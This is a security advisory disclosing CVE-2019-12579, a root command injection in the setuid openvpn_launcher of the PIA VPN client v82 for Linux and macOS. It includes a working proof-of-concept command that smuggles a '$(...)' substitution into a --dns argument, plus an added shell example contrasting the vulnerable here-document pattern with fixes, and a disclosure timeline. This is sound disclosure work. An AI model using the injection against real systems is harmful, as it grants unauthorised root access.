Title: PIA Linux, macOS Privilege Escalation: Command Injection
Author: Rich Mirch
CVE: CVE-2019-12579
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA)
VPN Client v82 for Linux and macOS could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.
The PIA Linux and macOS openvpn_launcher.64 binary is setuid root. This
binary accepts several parameters that update the system configuration. These
parameters are passed to operating system commands through a shell here
document (1). Because the parameters are not sanitized, shell metacharacters
in them are interpreted, so the binary can be tricked into running arbitrary
commands as root. A local unprivileged user can pass specially crafted
parameters that will be interpolated by the operating system calls.
References
(1) https://www.tldp.org/LDP/abs/html/here-docs.html
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Run openvpn_launcher.64 with the following parameters so that the id
command executes as root, with its output redirected to /dev/tty.
##########
# Linux
##########
/opt/pia/openvpn_launcher.64 --dns up a b c'$(/usr/bin/id>/dev/tty)' >/dev/null 2>/dev/null
##########
# macOS
##########
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher \
--dns up a b c'$(/usr/bin/id>/dev/tty)' >/dev/null 2>/dev/null
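The bug class above (a caller-controlled argument spliced into a shell here
document by a privileged helper) modelled as an added example. This is not
PIA's code and the function names, the nameserver use case, and the shape of
the vulnerable command string are assumptions for illustration; it shows why
an unquoted here document re-parses data as code, and two defensive
alternatives: passing the value as a shell argument so it is expanded exactly
once, and validating it against what the option actually means.

```shell
#!/bin/sh
# Added illustration, not PIA's code. Models the mechanism the advisory
# describes and two ways a setuid helper can avoid it.

# Assumed vulnerable shape: the caller's value is pasted into a command
# string that is then handed to a shell. The here-document delimiter is
# unquoted, so the inner shell performs $(...) substitution on whatever the
# caller supplied, before the command ever runs.
render_dns_unsafe() {
    sh -c "cat <<EOF
nameserver $1
EOF
"
}

# Fix 1: never let data be re-parsed as code. The script text is a
# constant; the value travels as a positional argument and is expanded
# once, as a string, when the inner shell reads $1.
render_dns_safe() {
    sh -c 'cat <<EOF
nameserver $1
EOF
' render_dns "$1"
}

# Fix 2: defense in depth for a privileged helper. Accept only values that
# look like what the option means (here, a dotted-quad IPv4 literal with
# each octet in 0..255). Plain POSIX sh, so the loop uses globals.
is_ipv4_literal() {
    case "$1" in
        *[!0-9.]*|''|.*|*.|*..*) return 1 ;;   # non-digit/dot, empty, stray dots
    esac
    rest=$1
    n=0
    while [ -n "$rest" ]; do
        octet=${rest%%.*}
        case "$rest" in
            *.*) rest=${rest#*.} ;;
            *)   rest= ;;
        esac
        n=$((n + 1))
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    [ "$n" -eq 4 ]
}

# Constructed input: a benign command substitution stands in for the
# payload. Only the unsafe path evaluates it.
if [ "${1:-}" = "demo" ]; then
    render_dns_unsafe 'x$(echo INJECTED)'   # prints: nameserver xINJECTED
    render_dns_safe   'x$(echo INJECTED)'   # prints: nameserver x$(echo INJECTED)
    is_ipv4_literal 10.0.0.1 && echo "10.0.0.1 accepted"
    is_ipv4_literal '1.2.3.4 x' || echo "'1.2.3.4 x' rejected"
fi
```

The real fix for a setuid launcher is stronger than either function: do not
spawn a shell at all, and pass each configuration value as its own argv entry
to the target program, so no interpreter ever sees the caller's bytes as
syntax. The allowlist check is still worth keeping, because a privileged
helper should reject anything that is not a plausible value for the option.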
Timeline:
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, that version was never released.
The desktop client was rewritten instead. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure